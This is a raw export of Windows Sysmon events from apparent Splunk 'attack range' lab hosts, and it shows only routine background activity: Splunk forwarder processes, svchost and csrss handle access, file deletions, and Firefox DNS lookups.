12:23:29.799{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044103Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:29.799{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044102Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:29.799{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044101Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:29.799{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044100Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:29.799{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E4C1-63C7-5206-00000000AF02}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044099Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:29.799{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E4C1-63C7-5206-00000000AF02}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044098Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:29.799{FE4C2B44-E4C1-63C7-5206-00000000AF02}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044097Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:29.783{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F2F004A077E32A1776B834BEFA7E7CD,SHA256=13760D34E5C84480D40E6615E16BDB07454604410B7F5A8E6AC21CD370C3B602,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044096Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:29.780{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=53B1160F4D85D9E79975A8E316155137,SHA256=0B80EF2BF09571CFE6EAC0C0BB3014336650827B6FF23D6767A577559036EDB1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044095Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:29.563{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044094Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:29.330{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016866Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.133{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E4C1-63C7-0A02-00000000B002}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016865Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.133{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016864Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.133{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016863Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.133{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016862Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.133{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016861Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.133{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016860Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.133{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016859Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.133{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016858Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.133{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016857Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.133{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016856Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.133{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E4C1-63C7-0A02-00000000B002}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016855Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.133{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E4C1-63C7-0A02-00000000B002}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016854Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.133{E5A8D418-E4C1-63C7-0A02-00000000B002}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000044120Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:27.711{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56376-false10.0.1.12-8000- 23542300x800000000000000044119Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:30.885{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5B6C98C320170A8A4211E4AB0394C00,SHA256=9C957E9468D446B3A7E757137AEA23E0CF3CB9E23FE656A904E1F2685CAA3811,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000044118Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:28.312{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.balrog.prod.cloudops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000044117Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:28.312{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.balrog.prod.cloudops.mozgcp.net035.244.181.201;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000016899Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.476{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E4C2-63C7-0C02-00000000B002}2160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016898Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.476{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016897Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.476{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 